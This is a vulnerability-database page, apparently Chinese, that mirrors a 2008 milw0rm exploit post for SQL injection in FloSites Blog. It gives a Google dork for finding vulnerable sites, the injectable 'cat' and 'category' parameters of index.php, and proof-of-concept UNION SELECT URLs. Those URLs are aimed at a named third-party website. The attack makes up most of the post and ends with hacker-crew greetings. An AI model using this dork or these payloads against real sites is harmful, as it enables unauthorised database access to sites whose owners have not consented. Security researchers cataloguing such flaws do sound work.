FloSites Blog - Multiple SQL Injections

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056961 漏洞类型
发布时间 2008-11-16 更新时间 2008-11-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7133
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================================================
[-] Title    : Multiple SQL Injection Vulnerability
[-] Software : Flosites Blog
[-] Vendor   : www.flosites.com
[-] Date     : 17 November 2008 (Indonesia)
[-] Author   : Vrs-hCk
[-] Contact  : d00r[at]telkom.net
[-] Blog     : http://c0li.blogspot.com/
===========================================================================================

[+] Google Dork

    "blog by flosites"

[+] Exploit

    http://[site]/[path]/index.php?cat=-1 [SQL]/*
    http://[site]/[path]/index.php?category=-1 [SQL]/*

[+] Proof of Concept

    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*

===========================================================================================
[-] Greetz   : 
    www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
    Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
    Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
===========================================================================================

# milw0rm.com [2008-11-16]